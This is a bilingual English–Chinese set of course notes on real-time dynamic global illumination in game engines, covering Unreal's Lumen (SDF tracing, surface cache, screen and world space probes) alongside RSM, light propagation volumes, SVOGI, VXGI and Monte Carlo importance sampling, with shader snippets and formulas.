      追踪光线并计算标志的三角形背面(超过 25% 的回射为负)

    webp

    • Original Mesh

      原始网格

    • Resolution is too low, important features are lost

      分辨率太低,重要功能丢失

    • Resolution has been increased, important features represented

      分辨率已提高,重要功能已呈现

    SDF for Thin meshes

    用于薄网格的 SDF

    • Half voxel expand to fix leaking

      半体素扩展以修复泄漏

    • Lost contact shadows due to surface bias

      表面偏移导致接触阴影丢失

      • Over occlusion better than leaking

        过度堵塞比泄漏好

    webp

    Ray Tracing with SDF

    使用 SDF 进行光线追踪

    Ray intersection skips through empty space based on distance to surface

    射线交点根据到曲面的距离跳过空白空间

    • Safe and fast

      安全快捷

    • Each time at $p$, just travel $SDF(p)$ distance

      每次在 $p$ 时,只需行进 $SDF(p)$ 距离

    webp

    Cone Tracing with SDF (ie. Soft Shadow)

    使用 SDF 进行圆锥体跟踪(即软阴影)

    webp

    Sparse Mesh SDF

    稀疏网格 SDF

    Divides the Mesh SDF into bricks

    将网格 SDF 划分为块

    • Define a max_encode_distance

      定义 max_encode 距离

      • Invalid if ∀ sdf(brick) > max_encode_distance

        如果 ∀sdf(brick) > max_encode_distance,则无效

    • IndirectionTable store the index of each brick

      IndirectionTable 存储每块砖的索引

    webp

    webp

    Mesh SDF LoD

    网状 SDF LoD

    • Every frame GPU gathers requests

      每一帧 GPU 都会收集请求

    • CPU download requests and streams pages in/out

      CPU 下载请求和流式页面输入/输出

    • 3mips are generated

      生成 3 个 MIP

      • Lowest resolution always loaded and the other 2streamed

        始终加载最低分辨率,其他 2 个分辨率为流式传输

    webp

    Sparse Mesh SDF

    稀疏网格 SDF

    webp

    Ray Tracing Cost in Real Scene

    真实场景中的光线追踪成本

    webp

    Trace camera rays and visualize the number of steps

    追踪相机光线并可视化步数

    Many Objects along Each Ray

    每条射线上有许多物体

    webp

    Number of hit objects along each ray

    沿每条射线的命中物体数量

    Global SDF

    全球 SDF

    • Global SDF is inaccurate near surface

      全球 SDF 在地表附近不准确

    • Sample object SDFs near start of cone, global SDF for the rest

      在圆锥体起点附近采样对象 SDF,其余部分为全局 SDF

    webp

    Ray Tracing with Global SDF

    使用全局 SDF 进行光线追踪

    Massively reduces tracing cost on overlapping objects

    大幅降低重叠对象的跟踪成本

    webp

    Cache Global SDF around Camera

    在相机周围缓存全局 SDF

    • 4 clipmaps centered around camera

      4 张以相机为中心的剪贴画

    • Clipmaps are scrolled with movement

      Clipmap 随着移动而滚动

    • Distant clipmaps updated less frequently

      远处的 clipmap 更新频率较低

    • Also sparsely stored (~16x memory saving)

      存储也很稀疏(约节省 16 倍内存)

    webp

    Phase 2 : Radiance Injection and Caching

    阶段 2:辐射注入和缓存

    Mesh card –orthogonal camera on 6-Axis Aligned directions

    网格卡——6 轴对齐方向上的正交相机

    class FLumenCard
    {
    FLumenCardOBB LocalOBB;
    FLumenCardOBB WorldOBB;
    uint8 AxisAliqnedDirectionIndex;
    }

    webp

    webp

    Generate Surface Cache

    生成 Surface 缓存

    Two Passes

    两个步骤

    Pass 1:Card capture

    步骤 1:卡捕获

    • Fix texel budget per frame (512 x 512)

      固定每帧的纹理像素预算(512 x 512)

    • Sort by distance to camera and GPU feedback

      按距离相机和 GPU 反馈排序

    • Capture resultion depends on card projection on screen

      捕获结果取决于屏幕上的卡片投影

    webp

    Pass 2:Copy cards to surface cache and compress

    步骤 2:将卡片复制到表面缓存并压缩

    webp

    4096 x 4096 Surface Cache Atlas

    贴图颜色通道纹理压缩缓存大小
    AlbedoRGB8BC716mb
    OpacityR8BC48mb
    DepthR16-32mb
    NormalHemisphere RG8BC416mb
    EmissiveRGB Float16BCGH16mb

    compress from 320mb to 88mb

    从 320mb 压缩到 88mb

    static FLumenSurfaceLayerConfig Configs[(uint32)ELumenSurfaceCacheLayer::MAX]
    {
    {TEXT("Depth"), PF_G16, PF_Unknown, PF_Unknown, FVector(1.af,0.0f,0.0f)},
    {TEXT("Albedo"), PF_R8G8B8A8,PF_BC7, PF_R32G32B32A32_UINT, FVector(0.0f,0.0f,0.0f)},
    {TEXT("Opacity"), PF_G8, PF_BC4, PF_R32G32B32A32_UINT, FVector(1.0f,0.0f,0.0f)},
    {TEXT("Normal"), PF_R8G8, PF_BC5, PF_R32G32A32_UINT, FVector(0.0f,0.0f,0.0f)},
    {TEXT("Emissive"), PF_BC4, PF_FloatR11G11B10, PF_BC6H, PF_R32G32B32A32_UINT, FVector(0.0f,0.0f,0.0f)}
    };

    View Dependent Per-Object Card Resolution

    查看每对象卡分辨率

    128 x 128 physical pages in a 4096 x 4096 atlas

    4096 x 4096 图集中的 128 x 128 个物理页面

    Card capture res >= 128 x 128

    卡捕获分辨率 >= 128 x 128

    • Split into multiple 128 x 128 physical pages

      拆分为多个 128 x 128 物理页面

    Card capture res < 128 x 128

    卡捕获分辨率 < 128 x 128

    • Sub-allocate from a 128 x 128 physical page

      从 128 x 128 物理页面进行子分配

    webp

    How can we “freeze” lighting on Surface Cache

    我们如何在 Surface Cache 上“冻结”照明

    How to compute lighting on hit?

    如何计算命中时的光照?

    • Is the pixel under the shadow

      像素是否位于阴影之下

    • How can we handle multi-bounce

      我们如何处理多次反弹

    Lighting Cache Pipeline

    照明缓存管道

    webp

    Direct Lighting

    直接照明

    • Divide 128 x 128 page into 8 x 8 tiles

      将 128 x 128 页划分为 8 x 8 个图块

    • Cull lights with 8 x 8 tile

      8 x 8 瓷砖装饰灯

    • Select first 8 lights per tile

      为每块瓷砖选择前 8 盏灯

    • 1bit shadow mask

      1bit 荫罩

    webp

    One tile can be lited by multilights, the result will be accumlated

    一块瓷砖可以被多盏灯照亮,结果会累加

    webp

    Global SDF can’t sample surface cache

    全局 SDF 无法对曲面缓存进行采样

    • no per mesh information, only hit position and normal

      无网格信息,仅命中位置和正常

    Use voxel lighting to sample

    使用体素照明进行采样

    webp

    Voxel Clipmapfor Radiance Caching of the Whole Scene

    体素剪贴画用于整个场景的辐射缓存

    4 level clipmaps of 64x64x64 voxels

    64 x 64 x 64 体素的 4 级剪贴图

    • Radiance per 6 directions per voxel

      每个体素每 6 个方向的辐射

    • Sample and interpolate 3 directions by normal

      通过法线对 3 个方向进行采样和插值

    • Clipmap0 cover 50m^3, voxel size is 0.78m

      Clipmap0 覆盖 50m^3,体素大小为 0.78m

    • Store in 3D texture

      存储在 3D 纹理中

    Clipmapupdate frequency rules

    剪贴图更新频率规则

    Clipmap 0Clipmap 1Clipmap 2Clipmap 3
    Start_Frame0137
    Update_interval2488

    webp

    Build Voxel Faces by Short Ray cast

    通过短光线投射构建体素人脸

    • Trace mesh DF on 6 directions per voxel

      在每个体素的 6 个方向上跟踪网格 DF

    • Hit mesh id and hit distance

      命中网格 id 和命中距离

    • RayStart = VoxelCenter – AxisDir * VoxelRaidus

    • RayEnd = VoxelCenter + AxisDir * VoxelRaidus

    webp

    store hit infro intovisibilty buffer uint32 [Hit distance| Hit object id]

    将命中信息存储到可见性缓冲区 uint32 [命中距离|命中对象 id]

    Filter Most Object Out by 4x4x4 Tiles

    通过 4x4x4 瓷砖过滤掉大部分对象

    webp

    Inject light into clipmap

    将光线注入 clipmap

    • Clear all voxel lighting in entire Clipmap

      清除整个 Clipmap 中的所有体素照明

    • Compact all valid VisBuffer in Clipmap

      压缩 Clipmap 中的所有有效 VisBuffer

    • Sampling FinalLighting from VisBufferand inject lighting

      从 VisBuffer 中采样 FinalLighting 并注入照明

    webp

    Indirect Lighting

    间接照明

    • Place 2 x 2 probes on each tile -each probe cover 4 x 4 texels

      在每个瓷砖上放置 2 x 2 个探头,每个探头覆盖 4 x 4 纹理像素

    • Trace 16 rays from hemisphere per probe

      每个探测器追踪 16 条来自半球的射线

    • Jitter probe placement and ray directions

      抖动探头位置和射线方向

    webp

    • Spatial filtering between probes

      探头之间的空间滤波

    • Convert to TwoBandSH (store in half4)

      转换为 TwoBandSH(存储在 half4)

    webp

    Per-Pixel Indirect Lighting with 4 Probe Interpolation

    采用 4 探头插值的每像素间接照明

    • Integrate on pixel -bilinear interpolation of 4 neighbor probes

      4 个相邻探针的像素双线性插值集成

    webp

    Combine Lighting

    组合照明

    FinalLighting = (DirectLighting + IndirectLighting) * Diffuse_Lambert(Albedo) + Emissive;

    webp

    Ligting Update Strategy

    Ligting 更新策略

    Fix budget

    固定预算

    • 1024 x 1024 texels for direct lighting

      1024 x 1024 像素用于直接照明

    • 512 x 512 texels for indirect lighting

      512 x 512 像素用于间接照明

    • Select pages to update based on Priority = LastUsed-LastUpdated

      根据优先级 = 上次使用上次更新选择要更新的页面

    Priority queue using bucket sort

    使用桶排序的优先级队列

    • 128 buckets

      128 桶

    • Update buckets with priority until reaching budget

      优先更新存储桶,直到达到预算

    Phase 3: Build a lot of Probes with Different Kinds

    第三阶段:构建大量不同类型的探测器

    Screen Space Probe

    屏幕空间探测器

    Octahedral atlas with border

    带边框的八面体图集

    • Typically 8 x 8 per probe

      通常每个探头 8 x 8

    • Uniformly distributed world space directions

      均匀分布的世界空间方向

    • Neighbors have matching directions

      邻居有匹配的方向

    Radiance and HitDistance in 2d atlas

    二维图谱中的辐射度和 HitDistance

    webp

    Octahedron mapping

    八面体映射

    webp

    float2 unitVectorTo0ctahedron(float3 N)
    {
    N.xy /= dot(1, abs(N));
    if(N.z<= 0)
    {
    x_factor = N.x >= 0 ? 1.0 : -1.0;
    y_factor = N.y >= 0 ? 1.0 : -1.0;
    N.xy = (1 - abs(N.yx)) * float2(x_factor, y_factor);
    return float2(N.xy);
    }

    Screen Probe Placement

    屏幕探头放置

    • Adaptive placement with Hierarchical Refinement

      具有层次细化的自适应布局

    • Iteratively place where interpolation fails

      迭代地放置插值失败的位置

    webp

    Plane distance weighting of Probe Interpolation

    探针插值的平面距离加权

    webp

    Detect Non-Interpolatable Cases

    检测不可插值的案例

    float4 PlaneDistances;
    PlaneDistances.x = abs(dot(float4(Position00, -1), ScenePlane));
    PlaneDistances.y = abs(dot(float4(Position10, -1), ScenePlane));
    PlaneDistances.z = abs(dot(float4(Position01, -1), ScenePlane));
    PlaneDistances.w = abs(dot(float4(Position11, -1), ScenePlane));

    float4 RelativeDepthDifference = PlaneDistances / SceneDepth;

    Depthweights = CornerDepths > 0 ? exp2(-10000. 0f * (RelativeDepthDifference * RelativeDepthDifference)) : 0;

    InterpolationWeights = float4(
    (1-BilinearWeights.y) * (1-BilinearWeights.x),
    (1-BilinearWeights.y) * BilinearWeights.x,
    BilinearWeights.y * (1 - BilinearWeights.x),
    BilinearWeights.y * BilinearWeights.x);
    InterpolationWeights *= DepthWeights;

    float Epsilon = .01f;
    ScreenProbeSample.Weights /= max(dot(ScreenProbeSample.Weights, 1), Epsilon);
    float LightingIsValid = (dot(ScreenProbeSample.Weights, .1) < 1.0f - Epsilon) ? 0.0f : 1.0f.

    Screen Probe Atlas

    屏幕探针图谱

    • Atlas have upper limit for real-time

      Atlas 有实时上限

    • Place adaptive probes at the bottom of the atlas

      将自适应探头放置在图谱底部

    webp

    webp

    Screen Probe Jitter

    屏幕探头抖动

    • Place probedirectly on pixels

      将探测器直接放置在像素上

    • Temporally jitter placement and direction

      时间抖动位置和方向

    • Use Hammersley points in [0, 15]

      在 [0,15] 中使用 Hammersley 积分

    webp

    Importance Sampling

    重要性采样

    But too much noise at ½ ray per pixel

    但每像素 ½ 射线的噪声太大

    webp

    Better sampling -importance sample incoming lighting and BRDF

    更好的采样-重要样本输入照明和 BRDF

    webp

    $\lim_{N\to\infty}\frac1N\sum_{k=1}^N\frac{L_i(l)f_s(l\to v)\cos(\theta l)}{P_k}$

    We would like to distribute rays proportional to the integrand

    我们希望光线的分布与被积函数成正比

    How can we estimate these?

    我们如何估算这些?

    Approximate Radiance Importance from Last Frame Probes

    最后一帧探测器的近似辐射重要性

    webp

    Incoming Radiance:

    入射辐射:

    • Reproject to last frame and average the four neighboring Screen Probes Radiance

      重新投影到最后一帧,并对四个相邻的屏幕探头辐射进行平均

    • No need to do an expensive search, as rays already indexed in octahedral atlas

      无需进行昂贵的搜索,因为光线已经在八面体图集中索引

    • Fallback to World Space Probe Radiance ifneighboring probes are occluded

      如果相邻探测器被遮挡,则回退到世界空间探测器辐射

    Accumulate Normal Distribution Nearby

    附近累积正态分布

    webp

    BRDF:

    • For a probe that’s placed on a flat wall, about half of its spherehaving a zero BRDF

      对于放置在平坦墙壁上的探头,其球体的大约一半具有零 BRDF

    • Accumulate from pixels that will use this Screen Probe

      从将使用此屏幕探测器的像素中累积

    Nearby Normal Accumulation

    附近正常堆积

    • Gathter 64 neighbor pixels around current probe’s pixel in a 32 x 32 pixelrange

      在 32 x 32 像素范围内收集当前探头像素周围的 64 个相邻像素

    • Acceptpixel if its depth weight > 0.1

      如果像素的深度权重 > 0.1,则接受像素

    • Accumulate these pixels’ world normal into SH

      将这些像素的世界法线累积到 SH 中

    webp

    Structured Importance Sampling

    结构化重要性抽样

    • Assigns a small number of samples to hierarchically structured areas of the Probability Density Function (PDF)

      将少量样本分配给概率密度函数的分层结构区域(PDF)

    • Achieves good global stratification

      实现良好的全球分层

    • Sample placement requires offline algorithm

      样本放置需要离线算法

    webp

    Maps perfectly to Octahedral mip quadtree!

    完美映射到八面体 mip 四叉树!

    webp

    Fix Budget Importance Sampling based on Lighting and BRDF

    基于照明和 BRDF 的固定预算重要性抽样

    • Start with uniformly distributed probe ray directions

      从均匀分布的探头射线方向开始

    • Fixed probe tracing ray count = 64

      固定探头跟踪射线计数 = 64

    • Calculate BRDF PDF * Lighting PDF for each Octahedral texel

      计算每个八面体纹理的 BRDF * Lighting PDF

    • Sort rays by PDF from low to high

      按 PDF 从低到高对光线进行排序

    • For every 3 rays with PDF below cull threshold, supersample the matching highest PDF ray

      对于 PDF 低于剔除阈值的每 3 条射线,对匹配的最高 PDF 射线进行超采样

    webp

    webp

    webp

    webp

    ​右边是使用 BRDF 和 Lighting PDF 的效果。

    Denoising and Spatial Probe Filtering

    去噪和空间探测滤波

    Denoise: Spatial filtering for Probe

    去噪:探头的空间滤波

    Large spatial filter for cheap

    大空间滤波器,成本低

    • Each probe cover 16 x 16 pixels, 3 x 3 filtering kernelin probe space equals 48 x 48 inscreen space

      每个探头覆盖 16 x 16 像素,探头空间中的 3 x 3 滤波核等于屏幕空间中的 48 x 48

    Can ignore normal differences between spatial neighbors

    可以忽略空间邻居之间的正常差异

    • Only depth weighting

      仅深度加权

    webp

    float GetFilterPositionWeight(floatProbeDepth, float sceneDepth)
    {
    float DepthDifference = abs(ProbeDepth - SceneDepth);
    float RelativeDepthDifference = DepthDifference / sceneDepth;
    return ProbeDepth >= 0 ? exp2(-spatialFilterPositionweightscale * (RelativeDepthDifference * RelativeDepthDifference)) : 0;
    }

    Denoise: Gather Radiance from neighbors

    降噪:从邻居那里收集辐射

    Gather radiance from matching Octahedral cell in neighbor probes

    在相邻探针中收集匹配八面体细胞的辐射

    Error weighting:

    错误加权:

    • Angle error from reprojected neighbor ray hits (less than 10 degree)

      重新投影的相邻光线照射的角度误差(小于 10 度)

    • Filters distant lighting, preserves local shadowing

      过滤远距离照明,保留局部阴影

    webp

    webp

    Clamp Distance Mismatching

    夹紧距离不匹配

    Angle error biases toward distant light = leaking

    角度误差偏向远光 = 泄漏

    • Distant light has no parallax and never gets rejected

      远光没有视差,永远不会被拒绝

    Solution: clamp neighbor hit distance to our own before reprojection

    解决方案:在重新投影之前,将邻居的击中距离限制在我们自己的距离

    webp

    webp

    World Space Probes and Ray Connecting

    世界空间探测器和射线连接

    World Space Radiance Cache

    世界空间辐射缓存

    Problem: distant lighting

    问题:远距离照明

    • Noise from small bright feature increases with distance

      小亮特征的噪声随着距离的增加而增加

    • Long incoherent traces are slow

      长的非相干痕迹很慢

    • Distant lighting is changing slowly -opportunity to cache

      远距离照明变化缓慢——缓存机会

    • Redundant operations for nearby Screen Probes

      附近屏幕探头的冗余操作

    Solution: separate sampling for distant Radiance

    解决方案:对远距离辐射进行单独采样

    • World space Radiance Caching for distant lighting

      用于远距离照明的世界空间辐射缓存

    • Stable error since world space -easy to hide

      自世界空间以来的稳定错误-易于隐藏

    webp

    Placement

    • 4 level clipmaps around camera

      相机周围的 4 级 clipmap

    • default resolution is 48^3

      默认分辨率为 48^3

    • clipmap0size is 50m^3

      clipmap0 的大小为 50m^3

    Radiance

    • 32 x 32 atlas a per probe

      每 32 x 32 的区域放置一个探头

    webp

    Connecting rays

    连接射线

    • How to connect Screen Probe ray and World Probe ray

      如何连接 Screen Probe ray 和 World Probe ray

    webp

    • World Probe ray must skip the interpolation footprint

      World Probe 射线必须跳过插值足迹

    webp

    • Screen Probe ray must cover interpolation footprint + skipped distance

      屏幕探测光线必须覆盖插值足迹 + 跳过距离

    webp

    • Problem: leaking!

      问题:泄漏!

    • World probe radiance should have been occluded

      世界探测器的辐射应该被遮挡了

      • But wasn’t due to incorrect parallax

        但不是因为视差不正确

    webp

    • Solution: simple sphere parallax

      解决方案:简单球面视差

    • Reproject Screen Probe ray intersection with World Probe sphere

      重新投影屏幕探头射线与 World Probe 球体的交点

    webp

    Placement and caching

    放置和缓存

    • Mark any position that we will interpolate from later in clipmap indirections

      标记我们稍后将在 clipmap 间接中插入的任何位置

    • For each marked world probe:

      对于每个标记的世界探测器:

      • Reuse traces from last frame, or allocate new probe index

        重用上一帧的跟踪,或分配新的探测索引

      • Re-trace a subset of cache hits to propagate lighting changes

        重新跟踪缓存命中的子集以传播照明变化

    webp

    Place Peobes → Reuse existing probe traces → Generate rays → Trace → Probe space filtering

    放置探针 → 重复使用现有的探针痕迹 → 生成射线 → 痕迹 → 探针空间过滤

    • Without World Space Probes

      没有世界空间探针

    webp

    • Screen Radiance Cache for the first 2meters

      前 2 米的屏幕辐射缓存

    • World Radiance Cache for any lighting further than that.

      World Radiance Cache 适用于任何超出此范围的照明。

    webp

    Phase 4 : Shading Full Pixels with Screen Space Probes

    阶段 4:使用屏幕空间探测器对全像素进行着色

    Convert Probe Radiance to 3rd order Spherical Harmonic:

    将探头辐射转换为三阶球面谐波:

    • SH is calculated per Screen Probe

      SH 按屏幕探头计算

    • Full res pixels load SH coherently

      全分辨率像素相干加载 SH

    • SH Diffuse integration cheap and high quality

      SH Diffuse 集成价格低廉,质量上乘

    webp

    importance sample the BRDF to get ray directions, and then sample the Radiance Cache.

    对 BRDF 进行重要性采样以获取光线方向,然后对辐射缓存进行采样。

    Final integration with SH

    与 SH 的最终整合

    webp

    Overall, Performance and Result

    总体、性能和结果

    Speed of Different Tracing Methods

    不同追踪方法的速度

    webp

    Red–Screen Space Trace 红色-屏幕空间轨迹

    fail to hit 未能命中↓

    Green–Mesh SDF Trace 绿色–网格 SDF 轨迹

    fail to hit 未能命中↓

    Blue–Global SDF Trace 蓝色–全球 SDF 跟踪

    webp

    webp

    webp

    webp

    ​右边是打开 SSGI 的效果。

    Performance

    性能

    Playstation 5

    1080p internal resolution

    1080p 内部分辨率

    Temporal Super Resolution to 4k

    时间超分辨率 4k

    webp

    webp

    webp

    webp

    webp

    webp

    Conclusion

    结论

    Complexity of Real Rendering

    webp

    $$L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$$

    ​这个方程可以解决所有的渲染问题,但是在实际应用中需要根据性能进行取舍。

    References

    参考

    Monte Carlo Integration

    GI

    Hardware Ray Tracing

    Signed Distance Field

    ]]>
    + 资源

    课程

    第二十一节:动态全局光照和 Lumen

    Global Illumination (GI)

    全局光照

    The Rendering Equation

    渲染方程

    James Kajiya,”The Rendering Equation.”
    SIGGRAPH 1986.
    Energy equilibrium:

    $L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$

    outgoing = emitted + reflected

    Radiance and Irradiance 辐射和辐照度

    webp

    ​这个方程揭示了渲染的规律。

    Global Illumination: Billions of Light Source

    全球照明:数十亿光源

    webp

    ​然而,要计算渲染方程的积分可不容易,现实生活中的反射有无数次。

    Global Illumination is Matter for Gaming

    全局照明对游戏很重要

    webp

    ​游戏中要加上一个全局照明以近似周围环境反射而来的光照效果。

    Monte CarloIntegration

    蒙特卡洛一体化

    webp

    • How to solve an integral, when it’s too hard to solve it analytically?

      当一个积分很难解析求解时,如何求解它?

    webp

    • Approximate integral with the average of randomly sample values

      随机样本值平均值的近似积分

    Monte Carlo Ray Tracing (Offline)

    蒙特卡罗射线追踪(离线)

    webp

    ​使用蒙特卡洛算法求解渲染方程中的积分。

    Sampling is the Key

    采样是关键

    • Noise decreases as the number of samples per pixel increases. The top left shows 1sample per pixel, and doubles from left to right each square.

      噪声随着每像素采样数的增加而降低。左上角显示每个像素 1 个样本,每个方格从左到右加倍。

    webp

    Sampling : Uniform Sampling

    取样:均匀取样

    webp

    $\begin{aligned}
    \int_a^bf(x)\mathrm{~d}x& \begin{aligned}&=\lim_{n\to\infty}\frac{1}{n}\sum_{i=1}^{n}f(x_i)(b-a)\end{aligned} \
    &=\lim_{n\to\infty}\frac1n\sum_{i=1}^n\frac{f(x_i)}{\frac1{b-a}}
    \end{aligned}$

    • We are doing uniform random sample, so we have factor $\frac{1}{b-a}$ here

      我们正在进行均匀随机采样,因此这里有因子$\frac{1}{b-a}$

    Probability Distribution Function

    概率分布函数

    webp

    $\int_a^bf(x)\mathrm{d}x\sim F_n(X)=\frac1n\sum_{k=1}^n\frac{f(X_k)}{PDF(X_k)}$

    Probability Distribution Function

    概率分布函数

    • Describes the relative likehood for this random variable to take on a given value

      描述此随机变量取给定值的相对可能性

    • Higher means more possible to be chosen

      更高意味着更有可能被选择

    Importance Sampling

    重要性采样

    The PDF can be arbitrary, but which is the best?

    PDF 可以是任意的,但哪个是最好的?

    webp

    Importance Sampling : Best PDF for Rendering?

    重要性采样:最佳的 PDF 渲染?

    • Rendering equation:

      渲染方程式:

      $L_o\left(p,\omega_o\right)=\int_{\Omega^+}L_i\left(p,\omega_i\right)f_r\left(p,\omega_i,\omega_o\right)\left(n\cdot\omega_i\right)\mathrm{d}\omega_i$

    • Monte Carlo Integration:

      蒙特卡洛积分:

      $L_o\left(p,\omega_o\right)\approx\frac{1}{N}\sum_{i=1}^{N}\frac{L_i\left(p,\omega_i\right)f_r\left(p,\omega_i,\omega_o\right)\left(n\cdot\omega_i\right)}{p\left(\omega_i\right)}$

    • What’s our f(x)?

      $L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)$

    • What’s our pdf?

      • Uniform: $p(\omega_i)=\frac1{2\pi}$
      • Other pdf? (cosine-weight, GGX)(余弦权重,GGX)

    Importance Sampling : PDF is Matter

    重要性采样:PDF 很重要

    webp

    ​重要性采样比均匀采样渲染出的效果更好。

    Importance Sampling: Cosine and GGX PDF

    重要性采样:余弦和 GGX PDF

    webp

    ​换一种 PDF 会产生不同的渲染效果。

    Reflective Shadow Maps (RSM, 2005)

    Let’s inject light in. (Photon Mapping?)

    反射阴影贴图(RSM,2005)

    让我们注入光线。(光子映射?)

    • Each pixel on the shadow map is a indirect light source

      阴影贴图上的每个像素都是间接光源

    webp

    • How the RSM pixel $X_p$ illuminates position $x$?

      RSM 像素 $X_p$ 如何照亮位置 $X$?

    $E_p(x,n)=\phi_p\frac{\max{0,\langle n_p|x-x_p\rangle}\max{0,\langle n|x_p-x\rangle}}{|x-x_p|^4}$

    • The indirect irradiance at a surface point $x$ can be approximated by summing up the illumination due to all pixel lights.

      表面点 $x$ 处的间接辐照度可以通过将所有像素光的照度相加来近似。

    • Do not consider occlusion.

      不要考虑遮挡。

    $$E(x,n)=\sum_{\text{pixels}p}E_p(x,n)$$

    webp

    Cone Tracing with RSM

    使用 RSM 进行锥体追踪

    • Gathering Indirect Illumination

      收集间接照明

      • random sampling RSM pixels

        随机采样 RSM 像素

      • precompute such a sampling pattern and reuse it for all indirect light computations

        预先计算这样的采样模式,并将其重新用于所有间接光计算

        • 400samples were sufficient

          400 个样本就足够了

        • use Poisson sampling to obtain a more even sample distribution

          使用泊松采样获得更均匀的样本分布

    webp

    Sampling pattern example. The sample density decreases and the sample weights (visualized by the disk radius) increases with the distance to the center.

    采样模式示例。随着到中心的距离的增加,样品密度降低,样品重量(通过圆盘半径显示)增加。

    Acceleration with Low-Res Indirect Illumination

    低分辨率间接照明加速

    • Compute the indirect illumination for a low resolution image

      计算低分辨率图像的间接照明

    • For each pixel on full resolution:

      对于全分辨率的每个像素:

      • get its four surrounding low-res samples

        获取其四个周围的低分辨率样本

      • validate by comparing normal and world space position

        通过比较正常空间位置和世界空间位置进行验证

      • bi-linear interpolation

        双线性插值

    • Recompute the left (red pixels)

      重新计算左侧(红色像素)

    webp

    Gears of War 4, Uncharted 4, The Last of US, etc.

    《战争机器 4》、《神秘海域 4》、“最后的美国”等

    webp

    Thanks, RSM

    Cool Ideas

    很酷的想法

    • Easy to be implemented

      易于实施

    • Photon Injection with RSM

      RSM 的光子注入

    • Cone sampling in mipmap

      mipmap 中的圆锥采样

    • Low-res Indirect illumination with error check

      低分辨率间接照明,带错误检查

    Cons

    缺点

    • Single bounce

      单次反弹

    • No visibility check for indirect illumination

      间接照明不进行能见度检查

    webp

    Light Propagation Volumes (LPV)

    光传播体积(LPV)

    First introduced in CryEngine 3(SIGGRAPH 2009)

    首次引入 CryEngine 3(SIGGRAPH 2009)

    webp

    • Key Idea

      核心思想

      • Use a 3D grid to propagate radiance from directly illuminated surfaces to anywhere else

        使用 3D 网格将辐射从直接照射的表面传播到其他任何地方

    webp

    Steps

    步骤

    1. Generation of radiance point set scene representation

      辐射点集场景表示的生成

    2. Injection of point cloud of virtual light sources into radiance volume

    将虚拟光源的点云注入辐射体积

    1. Volumetric radiance propagation

      体积辐射传播

    2. Scene lighting with final light propagation volume

      具有最终光传播量的场景照明

    Reflective shadow map generation → Radiance injection → Radiance propagation → Scene lighting

    反射阴影贴图生成→辐射注入→辐射传播→场景照明

    “Freeze” the Radiance in Voxel

    “冻结”体素中的光芒

    Light Injection

    光注入

    • Pre-subdivide the scene into a 3D grid

      将场景预细分为 3D 网格

    • For each grid cell, find enclosed virtual light sources

      对于每个网格单元,找到封闭的虚拟光源

    • Sum up their directional radiance distribution

      总结它们的方向辐射分布

    • Project to first 2 orders of SHs (4 in total)

      前 2 个 SH 订单的项目(共 4 个)

    webp

    Radiance Propagation

    辐射传播

    • For each grid cell, collect the radiance received from each of its 6 faces

      对于每个网格单元,收集从其 6 个面中的每一个面接收到的辐射

    • Sum up, and again use SH to represent

      总结一下,再次用 SH 表示

    • Repeat this propagation several times till the volume becomes stable

      重复此传播几次,直到体积稳定

    webp

    Light with “Limit Speed”?

    “限速”灯

    webp

    Sparse Voxel Octree for Real-time Global Illumination (SVOGI)

    稀疏体素八叉树用于实时全局照明(SVOGI)

    Voxelization Pass

    体素化通行证

    webp

    Collect Surface Voxels

    收集表面体素

    webp

    webp

    • Inject Irradiance into voxels from light

      从光线向体素中注入辐照度

    • Filter irradiance inside the octree

      八叉树内部的过滤辐照度

    Shading with Cone Tracing in Voxel Tree

    体素树中的圆锥体跟踪着色

    Pass 2 from the camera

    从相机中传 2

    • Emit some cones based on diffuse + specular BRDF

      基于漫反射 + 镜面反射 BRDF 发射一些锥体

    • Query in octree based on the (growing) size of the cone

      基于圆锥体(增长)大小的八叉树查询

    webp

    Voxelization Based Global Illumination (VXGI)

    基于体素化的全局照明(VXGI)

    webp

    • Store the voxel data in clipmaps

      将体素数据存储在 clipmap 中

      • Multi-resolution texture

        多分辨率纹理

      • Regions near the center have higher spatial resolution

        中心附近的区域具有更高的空间分辨率

      • Seems to map naturally to cone tracing needs

        似乎很自然地映射到锥体跟踪需求

    • A clipmap is easier to build than SVO

      clipmap 比 SVO 更容易构建

      • No nodes, pointers etc., handled by hardware

        没有由硬件处理的节点、指针等

    • A clipmap is easier to read from

      Clipmap 更容易阅读

    • Clipmap size is (64…256)^3 with 3…5 levels of detail

      Clipmap 大小为(64…256)^3,具有 3…5 个细节级别

      • 16…32 bytes per voxel => 12 MB … 2.5 GB of video memory required

        每个体素 16…32 字节=>12 MB…需要 2.5 GB 的视频内存

    Voxel Update and Toroidal Addressing

    体素更新和环形寻址

    • A fixed point in space always maps to the same address in the clipmap

      空间中的固定点总是映射到剪贴图中的同一地址

    • The background shows texture addresses: frac(worldPos.xy / clipmapSize.xy)

      背景显示纹理地址:frac(worldPos.xy / clipmapSize.xy)

    webp

    webp

    Voxelization for Opacity

    不透明度的体素化

    • We have a triangle and a voxel

      我们有一个三角形和一个体素

    • Select the projection plane that yields the biggest projection area

      选择产生最大投影面积的投影平面

    • Rasterize the triangle using MSAA to compute one coverage mask per pixel

      使用 MSAA 对三角形进行光栅化,以计算每个像素的一个覆盖掩模

    • Take the MSAA samples and reproject them onto other planes

      采集 MSAA 样本并将其重新投影到其他平面上

    • Repeat that process for all covered samples

      对所有覆盖的样本重复该过程

    • Thicken the result by blurring all the reprojected samples

      通过模糊所有重新投影的样本来增加结果

    webp

    Voxelization: Directional Coverage

    体素化:定向覆盖

    webp

    Light Injection

    光注入

    • Calculate emittance of voxels that contain surfaces lit by direct lights

      计算包含由直射光照亮的表面的体素的发射度

    • Take information from reflective shadow maps (RSM)

      从反射阴影图(RSM)中获取信息

    webp

    webp

    Shading with Cone Tracing

    使用圆锥体追踪进行着色

    • generate several cones based on BRDF

      基于 BRDF 生成多个锥体

    webp

    Accumulate Voxel Radiance and Opacity along the Path

    沿路径累积体素辐射度和不透明度

    $$C_{\mathrm{dst}}\leftarrow C_{\mathrm{dst}}+(1-\alpha_{\mathrm{dst}})C_{\mathrm{src}}\\alpha_\mathrm{dst}\leftarrow\alpha_\mathrm{dst}+(1-\alpha_\mathrm{dst})\alpha_\mathrm{src}$$

    webp

    webp

